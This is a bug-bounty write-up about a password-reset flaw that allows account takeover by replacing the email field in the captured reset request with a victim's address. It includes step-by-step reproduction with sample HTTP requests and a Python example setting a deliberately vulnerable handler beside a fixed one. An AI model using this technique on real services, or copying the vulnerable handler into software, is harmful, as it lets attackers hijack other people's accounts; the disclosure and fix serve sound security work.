Account takeover: write-up :)
Hello everyone, how are you all? I wish you all well. Most applications provide users with a "Reset Password" function via email. This function has always been a point of interest for bounty hunters and security researchers: from basic attacks such as rate-limit bypass and Host header injection to full account takeovers, it is great fun and a big win to invest time in.
I found this bug this week.
- Reported: 06 August 2020 16:15:22
- Accepted: 06 August 2020
- Fixed: 06 August 2020 21:12
Account takeover via password reset
In this case, I will show you where the injection point is and how to reproduce it.
Injection point
The password reset function of the application.
How to reproduce it?
Let's assume you're a hacker and you want to take over an account:
- find the password reset function on the application
- request a password reset for your own email address
- open your mail, follow the reset link and set a new password
- capture the HTTP request that the application sends
OPTIONS /api/new-password HTTP/1.1
Host: exaple.example.com
User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv;68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Control-Request-Method: POST
Accept-Control-Request-Headers: content-type,x-requested-with,x-xsrf-token
Referer: https://example.com/reset-password?email=ducky%40example.com&token=87hiuhd987234iu32jd9w87423jdwoi743298
Origin: https://example.com
Connection: close
Focus on the email parameter ducky%40example.com (this is the hacker's account). Change it to the victim's email, e.g. victim@example.com (URL-encoded, so @ becomes %40: "victim%40example.com"), and forward the request.
OPTIONS /api/new-password HTTP/1.1
Host: exaple.example.com
User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv;68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Control-Request-Method: POST
Accept-Control-Request-Headers: content-type,x-requested-with,x-xsrf-token
Referer: https://example.com/reset-password?email=ducky%40example.com&token=87hiuhd987234iu32jd9w87423jdwoi743298
Origin: https://example.com
Connection: close
Cookie: XSRF-TOKEN=JALKJDUIEHDjlkjlkjdoijekjIHJlkjlijdeoiujlkdamOIHJkjoi3j298jiJOIJ8UJLIJlkjoijo; session=ijoi8UOIJOIJKlj98u9jKJLJ198UJLKJLKJJIJijiklkjoijlkj&*^&%*(HJhiu*&8udk

{"email":"ducky@example.com","password":"Jakarta123!","c_password":"Jakarta123!","token":"*jdiujoij9IOK98uoiKJ98UjoiKJ098"}
Look at the email field in the JSON body: ducky@example.com is the hacker's account. Change it to the victim's account, forward the request and stop the capture.
Finally, the victim's account has been taken over.
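The root cause shown above is that the server takes the account to reset from the email in the request body instead of from the account the reset token was issued for. The following is an added example, not the target application's code: a handler that mirrors the write-up's bug beside a fixed one, with an in-memory user and token store standing in for the database (assumed names: USERS, RESET_TOKENS, issue_reset_token, new_password_vulnerable, new_password_fixed).

```python
import hashlib
import secrets
import time

# Constructed in-memory stores standing in for the application's database
# (assumption: the real app stores reset tokens keyed to one account).
USERS = {"ducky@example.com": {"pw": "old-a"}, "victim@example.com": {"pw": "old-v"}}
RESET_TOKENS = {}  # sha256(token) -> {"email": str, "expires": float, "used": bool}


def issue_reset_token(email, ttl=900):
    """Issue a single-use, expiring token bound to one account; store only its hash."""
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[hashlib.sha256(token.encode()).hexdigest()] = {
        "email": email, "expires": time.time() + ttl, "used": False}
    return token


def new_password_vulnerable(body):
    """Mirrors the bug in the write-up: the token is only checked for existence,
    and the account that receives the new password comes from the client's JSON."""
    digest = hashlib.sha256(body["token"].encode()).hexdigest()
    if digest not in RESET_TOKENS or body["password"] != body["c_password"]:
        return "rejected"
    USERS[body["email"]]["pw"] = body["password"]  # attacker-controlled target
    return "password changed for " + body["email"]


def new_password_fixed(body):
    """The target account is taken from the server-side token record, never from
    the body; the token must be unexpired and unused, and an email/token mismatch
    is rejected (and is worth logging as an attack signal)."""
    digest = hashlib.sha256(body["token"].encode()).hexdigest()
    rec = RESET_TOKENS.get(digest)
    if rec is None or rec["used"] or rec["expires"] < time.time():
        return "rejected"
    if body["password"] != body["c_password"]:
        return "rejected"
    if body.get("email") != rec["email"]:
        return "rejected"  # token belongs to a different account than requested
    rec["used"] = True  # single use: a replayed token cannot reset again
    USERS[rec["email"]]["pw"] = body["password"]
    return "password changed for " + rec["email"]
```

With the swapped email from the write-up, the vulnerable handler resets the victim's password while the fixed one rejects the request; a second use of the same token is also rejected.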